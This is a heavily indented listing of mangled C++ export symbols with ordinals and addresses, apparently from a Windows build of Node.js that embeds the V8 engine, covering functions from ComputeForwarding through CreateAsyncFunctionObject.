                                                                                                                                                                                                        ?ComputeForwarding@JumpThreading@compiler@internal@v8@@SA_NPEAVZone@34@PEAV?$ZoneVector@VRpoNumber@compiler@internal@v8@@@34@PEAVInstructionSequence@234@_N@Z44990x140f6dd20
                                                                                                                                                                                                        ?ComputeIncoming@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@PEAVOptimizedCompilationInfo@34@@Z45000x140eaac60
                                                                                                                                                                                                        ?ComputeLocation@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@@Z45010x140a0e650
                                                                                                                                                                                                        ?ComputeLocationFromException@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@V?$Handle@VObject@internal@v8@@@23@@Z45020x140a0e880
                                                                                                                                                                                                        ?ComputeLocationFromStackTrace@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@V?$Handle@VObject@internal@v8@@@23@@Z45030x140a0eaa0
                                                                                                                                                                                                        ?ComputeLoopState@CsaLoadElimination@compiler@internal@v8@@AEBAPEBVAbstractState@1234@PEAVNode@234@PEBV51234@@Z45040x140fa5620
                                                                                                                                                                                                        ?ComputeLoopState@LoadElimination@compiler@internal@v8@@AEBAPEBVAbstractState@1234@PEAVNode@234@PEBV51234@@Z45050x1410322d0
                                                                                                                                                                                                        ?ComputeLoopStateForStoreField@LoadElimination@compiler@internal@v8@@AEBAPEBVAbstractState@1234@PEAVNode@234@PEBV51234@AEBUFieldAccess@234@@Z45060x141033020
                                                                                                                                                                                                        ?ComputeSamplingInterval@CpuProfiler@internal@v8@@AEBA?AVTimeDelta@base@3@XZ45070x140761620
                                                                                                                                                                                                        ?ComputeSchedule@Scheduler@compiler@internal@v8@@SAPEAVSchedule@234@PEAVZone@34@PEAVGraph@234@V?$Flags@W4Flag@Scheduler@compiler@internal@v8@@H@base@4@PEAVTickCounter@34@PEBVProfileDataFromFile@34@@Z45080x141050190
                                                                                                                                                                                                        ?ComputeSpecialRPO@Scheduler@compiler@internal@v8@@SAPEAV?$ZoneVector@PEAVBasicBlock@compiler@internal@v8@@@34@PEAVZone@34@PEAVSchedule@234@@Z45090x141050360
                                                                                                                                                                                                        ?ComputeSpecialRPONumbering@Scheduler@compiler@internal@v8@@AEAAXXZ45100x1410504c0
                                                                                                                                                                                                        ?ComputeStepSizeInBytes@IncrementalMarking@internal@v8@@AEAA_KW4StepOrigin@23@@Z45110x1409a6f60
                                                                                                                                                                                                        ?Concat@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVIsolate@2@V32@1@Z45120x140b0d740
                                                                                                                                                                                                        ?ConcatenateBytes@WasmCode@wasm@internal@v8@@AEAA?AV?$unique_ptr@$$BY0A@$$CBEU?$default_delete@$$BY0A@$$CBE@std@@@std@@V?$initializer_list@V?$Vector@$$CBE@base@v8@@@6@@Z45130x140569310
                                                                                                                                                                                                        ?ConfigureCloneObject@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VMap@internal@v8@@@23@0@Z45140x140879880
                                                                                                                                                                                                        ?ConfigureDefaults@ResourceConstraints@v8@@QEAAX_K0@Z45150x140b0d810
                                                                                                                                                                                                        ?ConfigureDefaultsFromHeapSize@ResourceConstraints@v8@@QEAAX_K0@Z45160x140b0d870
                                                                                                                                                                                                        ?ConfigureFlags@OptimizedCompilationInfo@internal@v8@@AEAAXXZ45170x140a827e0
                                                                                                                                                                                                        ?ConfigureHandlerMode@FeedbackNexus@internal@v8@@QEAAXAEBVMaybeObjectHandle@23@@Z45180x140879f40
                                                                                                                                                                                                        ?ConfigureLexicalVarMode@FeedbackNexus@internal@v8@@QEAA_NHH_N@Z45190x140879fc0
                                                                                                                                                                                                        ?ConfigureMegaDOM@FeedbackNexus@internal@v8@@QEAAXAEBVMaybeObjectHandle@23@@Z45200x14087a050
                                                                                                                                                                                                        ?ConfigureMegamorphic@FeedbackNexus@internal@v8@@QEAA_NW4IcCheckType@23@@Z45210x14087a0f0
                                                                                                                                                                                                        ?ConfigureMegamorphic@FeedbackNexus@internal@v8@@QEAA_NXZ45220x14087a1a0
                                                                                                                                                                                                        ?ConfigureMonomorphic@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VName@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@AEBVMaybeObjectHandle@23@@Z45230x14087a240
                                                                                                                                                                                                        ?ConfigurePolymorphic@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VName@internal@v8@@@23@AEBV?$vector@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@V?$allocator@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@@2@@std@@@Z45240x14087a520
                                                                                                                                                                                                        ?ConfigurePropertyCellMode@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VPropertyCell@internal@v8@@@23@@Z45250x14087a870
                                                                                                                                                                                                        ?ConfigureUninitialized@FeedbackNexus@internal@v8@@QEAAXXZ45260x14087a8d0
                                                                                                                                                                                                        ?ConnectUnreachableToEnd@GraphAssembler@compiler@internal@v8@@QEAAXXZ45270x140f59940
                                                                                                                                                                                                        ?Constant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@AEBVObjectRef@234@@Z45280x140f55ab0
                                                                                                                                                                                                        ?Constant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@N@Z45290x140f55c00
                                                                                                                                                                                                        ?Constant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@AEBVObjectRef@234@@Z45300x140f59a40
                                                                                                                                                                                                        ?Constant@Type@compiler@internal@v8@@SA?AV1234@NPEAVZone@34@@Z45310x140e9fb50
                                                                                                                                                                                                        ?Constant@Type@compiler@internal@v8@@SA?AV1234@PEAVJSHeapBroker@234@V?$Handle@VObject@internal@v8@@@34@PEAVZone@34@@Z45320x140e9fc20
                                                                                                                                                                                                        ?ConstantPoolEntryFor@BytecodeJumpTable@interpreter@internal@v8@@QEAA_KH@Z45330x1408f3ba0
                                                                                                                                                                                                        ?Construct@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z45340x14091c380
                                                                                                                                                                                                        ?Construct@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z45350x140ab25f0
                                                                                                                                                                                                        ?Construct@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@@Z45360x140f3ac00
                                                                                                                                                                                                        ?ConstructForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z45370x140ab2610
                                                                                                                                                                                                        ?ConstructForwardVarargs@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KI@Z45380x140f3ace0
                                                                                                                                                                                                        ?ConstructFunction@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z45390x140ab2630
                                                                                                                                                                                                        ?ConstructFunctionForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z45400x140ab2650
                                                                                                                                                                                                        ?ConstructNewMap@MapUpdater@internal@v8@@AEAA?AW4State@123@XZ45410x140816c60
                                                                                                                                                                                                        ?ConstructNewMapWithIntegrityLevelTransition@MapUpdater@internal@v8@@AEAA?AW4State@123@XZ45420x1408171e0
                                                                                                                                                                                                        ?ConstructVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z45430x140ab2670
                                                                                                                                                                                                        ?ConstructWithArrayLike@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVCallFrequency@234@AEBUFeedbackSource@234@@Z45440x140f3adb0
                                                                                                                                                                                                        ?ConstructWithSpread@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z45450x14091c440
                                                                                                                                                                                                        ?ConstructWithSpread@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z45460x140ab2690
                                                                                                                                                                                                        ?ConstructWithSpread@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@@Z45470x140f3ae90
                                                                                                                                                                                                        ?Consume@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4Value@Token@23@@Z45480x140774520
                                                                                                                                                                                                        ?ConsumeCComment@AsmJsScanner@internal@v8@@AEAA_NXZ45490x1406366a0
                                                                                                                                                                                                        ?ConsumeCPPComment@AsmJsScanner@internal@v8@@AEAAXXZ45500x140636780
                                                                                                                                                                                                        ?ConsumeCompareOrShift@AsmJsScanner@internal@v8@@AEAAXI@Z45510x1406367f0
                                                                                                                                                                                                        ?ConsumeIdentifier@AsmJsScanner@internal@v8@@AEAAXI@Z45520x1406369e0
                                                                                                                                                                                                        ?ConsumeNumber@AsmJsScanner@internal@v8@@AEAAXI@Z45530x140636ce0
                                                                                                                                                                                                        ?ConsumeString@AsmJsScanner@internal@v8@@AEAAXI@Z45540x140637070
                                                                                                                                                                                                        ?Contains@ArrayBufferList@internal@v8@@QEAA_NPEAVArrayBufferExtension@23@@Z45550x1409f27a0
                                                                                                                                                                                                        ?Contains@BitVector@internal@v8@@QEBA_NH@Z45560x1404bb6f0
                                                                                                                                                                                                        ?Contains@CodeObjectRegistry@internal@v8@@QEBA_N_K@Z45570x1409f2030
                                                                                                                                                                                                        ?Contains@Heap@internal@v8@@QEBA_NVHeapObject@23@@Z45580x1409b3b10
                                                                                                                                                                                                        ?Contains@LargeObjectSpace@internal@v8@@QEAA_NVHeapObject@23@@Z45590x140483090
                                                                                                                                                                                                        ?Contains@MemoryRegion@internal@cppgc@@QEBA_NAEBV123@@Z45600x140450f80
                                                                                                                                                                                                        ?Contains@MemoryRegion@internal@cppgc@@QEBA_NPEBE@Z45610x140450fb0
                                                                                                                                                                                                        ?Contains@NewSpace@internal@v8@@QEBA_NVHeapObject@23@@Z45620x140483020
                                                                                                                                                                                                        ?Contains@NewSpace@internal@v8@@QEBA_NVObject@23@@Z45630x140483040
                                                                                                                                                                                                        ?Contains@PagedSpace@internal@v8@@QEBA_NVObject@23@@Z45640x140483070
                                                                                                                                                                                                        ?Contains@PagedSpace@internal@v8@@QEBA_N_K@Z45650x140483090
                                                                                                                                                                                                        ?Contains@ReadOnlyHeap@internal@v8@@SA_NVHeapObject@23@@Z45660x140963730
                                                                                                                                                                                                        ?Contains@ReadOnlyHeap@internal@v8@@SA_N_K@Z45670x140963730
                                                                                                                                                                                                        ?Contains@Type@compiler@internal@v8@@CA_NPEBVRangeType@234@0@Z45680x140e9fd40
                                                                                                                                                                                                        ?ContainsAnyLocalHeap@GlobalSafepoint@internal@v8@@QEAA_NXZ45690x1409625b0
                                                                                                                                                                                                        ?ContainsAsmModule@Scope@internal@v8@@QEBA_NXZ45700x140af3940
                                                                                                                                                                                                        ?ContainsCall@InstructionSequence@compiler@internal@v8@@QEBA_NXZ45710x1404bb740
                                                                                                                                                                                                        ?ContainsCode@Heap@internal@v8@@QEBA_NVHeapObject@23@@Z45720x1409b3c30
                                                                                                                                                                                                        ?ContainsForTesting@FreeList@internal@cppgc@@QEBA_NUBlock@123@@Z45730x140467000
                                                                                                                                                                                                        ?ContainsLabel@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEBV?$ZoneList@PEBVAstRawString@internal@v8@@@23@PEBVAstRawString@23@@Z45740x140774530
                                                                                                                                                                                                        ?ContainsLocal@BytecodeLoopAssignments@compiler@internal@v8@@QEBA_NH@Z45750x141097cc0
                                                                                                                                                                                                        ?ContainsLocalHeap@GlobalSafepoint@internal@v8@@QEAA_NPEAVLocalHeap@23@@Z45760x1409625f0
                                                                                                                                                                                                        ?ContainsOnlyOneByte@String@v8@@QEBA_NXZ45770x140b0d930
                                                                                                                                                                                                        ?ContainsParameter@BytecodeLoopAssignments@compiler@internal@v8@@QEBA_NH@Z45780x141097d10
                                                                                                                                                                                                        ?ContainsSlow@LargeObjectSpace@internal@v8@@QEAA_N_K@Z45790x1409a51a0
                                                                                                                                                                                                        ?ContainsSlow@NewSpace@internal@v8@@QEBA_N_K@Z45800x1404830b0
                                                                                                                                                                                                        ?ContainsSlow@PagedSpace@internal@v8@@QEBA_N_K@Z45810x1409646e0
                                                                                                                                                                                                        ?Context@Local@MarkingWorklists@internal@v8@@QEBA_KXZ45820x1402e31d0
                                                                                                                                                                                                        ?ContextAccessOf@compiler@internal@v8@@YAAEBVContextAccess@123@PEBVOperator@123@@Z45830x14032ab80
                                                                                                                                                                                                        ?ContextChainLength@Scope@internal@v8@@QEBAHPEAV123@@Z45840x140af39a0
                                                                                                                                                                                                        ?ContextChainLengthUntilOutermostSloppyEval@Scope@internal@v8@@QEBAHXZ45850x140af39d0
                                                                                                                                                                                                        ?ContextDisposedNotification@Isolate@v8@@QEAAH_N@Z45860x140b0da70
                                                                                                                                                                                                        ?ContextHeaderLength@Scope@internal@v8@@QEBAHXZ45870x1406eaba0
                                                                                                                                                                                                        ?ContextId@Script@debug@v8@@QEBA?AV?$Maybe@H@3@XZ45880x140a6e630
                                                                                                                                                                                                        ?ContextLocalCount@Scope@internal@v8@@QEBAHXZ45890x140af3a00
                                                                                                                                                                                                        ?ContextRegister@CallInterfaceDescriptor@internal@v8@@SA?AVRegister@23@XZ45900x1404af200
                                                                                                                                                                                                        ?Continuations@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRawMachineLabel@234@1@Z45910x14108c8f0
                                                                                                                                                                                                        ?Continue@ConsStringIterator@internal@v8@@AEAA?AVString@23@PEAH@Z45920x1407c3c70
                                                                                                                                                                                                        ?Continue@LoopBuilder@interpreter@internal@v8@@QEAAXXZ45930x1408f3bb0
                                                                                                                                                                                                        ?ContinueIfNull@LoopBuilder@interpreter@internal@v8@@QEAAXXZ45940x1408f3be0
                                                                                                                                                                                                        ?ContinueIfUndefined@LoopBuilder@interpreter@internal@v8@@QEAAXXZ45950x1408f3c10
                                                                                                                                                                                                        ?ContributeToSweepingMain@PagedSpace@internal@v8@@IEAA_NHHHW4AllocationOrigin@23@@Z45960x140964710
                                                                                                                                                                                                        ?ControlInputCount@Operator@compiler@internal@v8@@QEBAHXZ45970x1404bb7b0
                                                                                                                                                                                                        ?ControlOutputCount@Operator@compiler@internal@v8@@QEBAHXZ45980x1403b2bd0
                                                                                                                                                                                                        ?ConvertBinaryToNaryOperationSourceRange@Parser@internal@v8@@AEAAXPEAVBinaryOperation@23@PEAVNaryOperation@23@@Z45990x140774560
                                                                                                                                                                                                        ?ConvertPlainPrimitiveToNumber@TypedOptimization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z46000x141079410
                                                                                                                                                                                                        ?ConvertReceiver@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z46010x1410a0ca0
                                                                                                                                                                                                        ?ConvertReceiver@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ConvertReceiverMode@34@@Z46020x140f4dc80
                                                                                                                                                                                                        ?ConvertTaggedHoleToUndefined@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@V534@@Z46030x140f59aa0
                                                                                                                                                                                                        ?ConvertTaggedHoleToUndefined@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z46040x1410a0d80
                                                                                                                                                                                                        ?ConvertTaggedHoleToUndefined@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ46050x140f4dcd0
                                                                                                                                                                                                        ?ConvertToIndex@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@W4MessageTemplate@23@@Z46060x1407f3c80
                                                                                                                                                                                                        ?ConvertToInteger@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z46070x1407f3f40
                                                                                                                                                                                                        ?ConvertToKeysArray@OrderedHashSet@internal@v8@@SA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashSet@internal@v8@@@23@W4GetKeysConversion@23@@Z46080x1407e38a0
                                                                                                                                                                                                        ?ConvertToLength@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z46090x1407f3fe0
                                                                                                                                                                                                        ?ConvertToString@Object@internal@v8@@CA?AV?$MaybeHandle@VString@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z46100x1407f4630
                                                                                                                                                                                                        ?ConvertUsesToOperand@LiveRange@compiler@internal@v8@@QEAAXAEBVInstructionOperand@234@0@Z46110x140f85060
                                                                                                                                                                                                        ?Copy@Buffer@node@@YA?AV?$MaybeLocal@VObject@v8@@@v8@@PEAVIsolate@4@PEBD_K@Z46120x14020f700
                                                                                                                                                                                                        ?Copy@RegExpBytecodeGenerator@internal@v8@@AEAAXPEAE@Z46130x14073d2e0
                                                                                                                                                                                                        ?CopyAndRelocate@NativeModuleDeserializer@wasm@internal@v8@@AEAAXAEBUDeserializationUnit@234@@Z46140x140528550
                                                                                                                                                                                                        ?CopyBytecodeArray@Factory@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@V423@@Z46150x1409cf930
                                                                                                                                                                                                        ?CopyCanonicalHandlesForTesting@JSHeapBroker@compiler@internal@v8@@AEAAXV?$unique_ptr@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@U?$default_delete@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@@std@@@std@@@Z46160x140f2e620
                                                                                                                                                                                                        ?CopyCode@Factory@internal@v8@@QEAA?AV?$Handle@VCode@internal@v8@@@23@V423@@Z46170x1409cfc10
                                                                                                                                                                                                        ?CopyCodePages@Isolate@v8@@QEAA_K_KPEAUMemoryRange@2@@Z46180x140b0dcb0
                                                                                                                                                                                                        ?CopyContents@ArrayBufferView@v8@@QEAA_KPEAX_K@Z46190x140b0dd40
                                                                                                                                                                                                        ?CopyFixedArray@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@@Z46200x1409cff30
                                                                                                                                                                                                        ?CopyFixedArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@H@Z46210x1409cffe0
                                                                                                                                                                                                        ?CopyFixedArrayUpTo@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@HW4AllocationType@23@@Z46220x1409d0000
                                                                                                                                                                                                        ?CopyFixedArrayWithMap@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@V?$Handle@VMap@internal@v8@@@23@@Z46230x1409d0120
                                                                                                                                                                                                        ?CopyFixedDoubleArray@Factory@internal@v8@@QEAA?AV?$Handle@VFixedDoubleArray@internal@v8@@@23@V423@@Z46240x1409d0140
                                                                                                                                                                                                        ?CopyForPreventExtensions@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@W4PropertyAttributes@23@V?$Handle@VSymbol@internal@v8@@@23@PEBD_N@Z46250x14080fee0
                                                                                                                                                                                                        ?CopyFrom@BitVector@internal@v8@@AEAAXTDataStorage@123@H@Z46260x1404bb7c0
                                                                                                                                                                                                        ?CopyFrom@BitVector@internal@v8@@QEAAXAEBV123@@Z46270x1404bb880
                                                                                                                                                                                                        ?CopyGlobal@GlobalHandles@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEA_K@Z46280x1409f57c0
                                                                                                                                                                                                        ?CopyGlobalReference@V8@v8@@CAPEA_KPEA_K@Z46290x140b0de50
                                                                                                                                                                                                        ?CopyInitialMap@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@HHH@Z46300x1408100e0
                                                                                                                                                                                                        ?CopyInsertDescriptor@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@PEAVDescriptor@23@W4TransitionFlag@23@@Z46310x140810220
                                                                                                                                                                                                        ?CopyJSObject@Factory@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@23@V423@@Z46320x1409d0200
                                                                                                                                                                                                        ?CopyJSObjectWithAllocationSite@Factory@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@23@V423@V?$Handle@VAllocationSite@internal@v8@@@23@@Z46330x1409d0220
                                                                                                                                                                                                        ?CopyPropertyArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VPropertyArray@internal@v8@@@23@V423@H@Z46340x1409d0880
                                                                                                                                                                                                        ?CopyTableEntries@WasmInstanceObject@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@IIIII@Z46350x14052ef70
                                                                                                                                                                                                        ?CopyTo@FixedArray@internal@v8@@QEBAXHV123@HH@Z46360x1407f4ba0
                                                                                                                                                                                                        ?CopyToHeap@ByteData@PreparseDataBuilder@internal@v8@@QEAA?AV?$Handle@VPreparseData@internal@v8@@@34@PEAVIsolate@34@H@Z46370x14079ffd0
                                                                                                                                                                                                        ?CopyToLocalHeap@ByteData@PreparseDataBuilder@internal@v8@@QEAA?AV?$Handle@VPreparseData@internal@v8@@@34@PEAVLocalIsolate@34@H@Z46380x1407a0020
                                                                                                                                                                                                        ?CopyToZone@ByteData@PreparseDataBuilder@internal@v8@@QEAAPEAVZonePreparseData@34@PEAVZone@34@H@Z46390x1407a0070
                                                                                                                                                                                                        ?CopyTracedGlobal@GlobalHandles@internal@v8@@SAXPEBQEB_KPEAPEA_K@Z46400x1409f5800
                                                                                                                                                                                                        ?CopyTracedGlobalReference@V8@v8@@CAXPEBQEB_KPEAPEA_K@Z46410x140b0de70
                                                                                                                                                                                                        ?CopyWasmMemory@BackingStore@internal@v8@@QEAA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_K@Z46420x1408c9740
                                                                                                                                                                                                        ?CopyWeakArrayListAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VWeakArrayList@internal@v8@@@23@V423@HW4AllocationType@23@@Z46430x1409d09b0
                                                                                                                                                                                                        ?CopyWeakFixedArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VWeakFixedArray@internal@v8@@@23@V423@H@Z46440x1409d0aa0
                                                                                                                                                                                                        ?CopyWithConstant@Map@internal@v8@@SA?AV?$MaybeHandle@VMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@W4TransitionFlag@23@@Z46450x1408106f0
                                                                                                                                                                                                        ?CopyWithField@Map@internal@v8@@SA?AV?$MaybeHandle@VMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VFieldType@internal@v8@@@23@W4PropertyAttributes@23@W4PropertyConstness@23@VRepresentation@23@W4TransitionFlag@23@@Z46460x140810810
                                                                                                                                                                                                        ?Count@BitVector@internal@v8@@QEBAHXZ46470x1406b50f0
                                                                                                                                                                                                        ?Count@BlockData@Coverage@debug@v8@@QEBAIXZ46480x1404bc210
                                                                                                                                                                                                        ?Count@FunctionData@Coverage@debug@v8@@QEBAIXZ46490x1404bc210
                                                                                                                                                                                                        ?CountTotalPages@PagedSpace@internal@v8@@QEAAHXZ46500x1409647a0
                                                                                                                                                                                                        ?CountUsage@Isolate@internal@v8@@QEAAXW4UseCounterFeature@13@@Z46510x140a0ec30
                                                                                                                                                                                                        ?CountUsage@Parser@internal@v8@@AEAAXW4UseCounterFeature@Isolate@3@@Z46520x140774680
                                                                                                                                                                                                        ?Covers@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z46530x140f850b0
                                                                                                                                                                                                        ?Create@ArrayBufferAllocator@node@@SA?AV?$unique_ptr@VArrayBufferAllocator@node@@U?$default_delete@VArrayBufferAllocator@node@@@std@@@std@@_N@Z46540x14028c310
                                                                                                                                                                                                        ?Create@CppHeap@v8@@SA?AV?$unique_ptr@VCppHeap@v8@@U?$default_delete@VCppHeap@v8@@@std@@@std@@PEAVPlatform@2@AEBUCppHeapCreateParams@2@@Z46550x1409e9a90
                                                                                                                                                                                                        ?Create@EternalHandles@internal@v8@@QEAAXPEAVIsolate@23@VObject@23@PEAH@Z46560x1409f58c0
                                                                                                                                                                                                        ?Create@ExternalReference@internal@v8@@SA?AV123@PEAVApiFunction@3@W4Type@123@@Z46570x140078b00
                                                                                                                                                                                                        ?Create@ExternalReference@internal@v8@@SA?AV123@_K@Z46580x140078b40
                                                                                                                                                                                                        ?Create@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@@Z46590x1409f59c0
                                                                                                                                                                                                        ?Create@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@_K@Z46600x1409f5ba0
                                                                                                                                                                                                        ?Create@Heap@cppgc@@SA?AV?$unique_ptr@VHeap@cppgc@@U?$default_delete@VHeap@cppgc@@@std@@@std@@V?$shared_ptr@VPlatform@cppgc@@@4@UHeapOptions@12@@Z46610x140462180
                                                                                                                                                                                                        ?Create@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ46620x140eb6060
                                                                                                                                                                                                        ?Create@LargePage@internal@cppgc@@SAPEAV123@AEAVPageBackend@23@AEAVLargePageSpace@23@_K@Z46630x140464730
                                                                                                                                                                                                        ?Create@LivenessBrokerFactory@internal@cppgc@@SA?AVLivenessBroker@3@XZ46640x140461a00
                                                                                                                                                                                                        ?Create@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@H@Z46650x140810ae0
                                                                                                                                                                                                        ?Create@MultiIsolatePlatform@node@@SA?AV?$unique_ptr@VMultiIsolatePlatform@node@@U?$default_delete@VMultiIsolatePlatform@node@@@std@@@std@@HPEAVTracingController@v8@@@Z46660x14028c460
                                                                                                                                                                                                        ?Create@NormalPage@internal@cppgc@@SAPEAV123@AEAVPageBackend@23@AEAVNormalPageSpace@23@@Z46670x1404647a0
                                                                                                                                                                                                        ?Create@PropertyIterator@debug@v8@@SA?AV?$unique_ptr@VPropertyIterator@debug@v8@@U?$default_delete@VPropertyIterator@debug@v8@@@std@@@std@@V?$Local@VContext@v8@@@3@V?$Local@VObject@v8@@@3@@Z46680x140a6e6a0
                                                                                                                                                                                                        ?Create@StackTraceIterator@debug@v8@@SA?AV?$unique_ptr@VStackTraceIterator@debug@v8@@U?$default_delete@VStackTraceIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@H@Z46690x140a67ce0
                                                                                                                                                                                                        ?Create@TracedValue@tracing@v8@@SA?AV?$unique_ptr@VTracedValue@tracing@v8@@U?$default_delete@VTracedValue@tracing@v8@@@std@@@std@@XZ46700x1406b6f10
                                                                                                                                                                                                        ?CreateAndSetEmbeddedBlob@Isolate@internal@v8@@AEAAXXZ46710x140a0ecd0
                                                                                                                                                                                                        ?CreateArguments@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4CreateArgumentsType@34@@Z46720x14091c500
                                                                                                                                                                                                        ?CreateArguments@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CreateArgumentsType@34@@Z46730x140f3af70
                                                                                                                                                                                                        ?CreateArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KV?$Optional@VAllocationSiteRef@compiler@internal@v8@@@base@4@@Z46740x140f3b030
                                                                                                                                                                                                        ?CreateArrayBufferAllocator@node@@YAPEAVArrayBufferAllocator@1@XZ46750x14028c4d0
                                                                                                                                                                                                        ?CreateArrayFromIterable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ46760x14091c740
                                                                                                                                                                                                        ?CreateArrayFromIterable@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ46770x140f3b130
                                                                                                                                                                                                        ?CreateArrayIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4IterationKind@34@@Z46780x140f3b1c0
                                                                                                                                                                                                        ?CreateArrayLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z46790x14091c860
                                                                                                                                                                                                        ?CreateArrayOfSize@FeedbackNexus@internal@v8@@AEAA?AV?$Handle@VWeakFixedArray@internal@v8@@@23@H@Z46800x14087aa80
                                                                                                                                                                                                        ?CreateAsyncCompileJob@WasmEngine@wasm@internal@v8@@AEAAPEAVAsyncCompileJob@234@PEAVIsolate@34@AEBVWasmFeatures@234@V?$unique_ptr@$$BY0A@EU?$default_delete@$$BY0A@E@std@@@std@@_KV?$Handle@VContext@internal@v8@@@34@PEBDV?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@9@H@Z46810x140555220
                                                                                                                                                                                                        ?CreateAsyncFunctionObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z46820x140f3b280
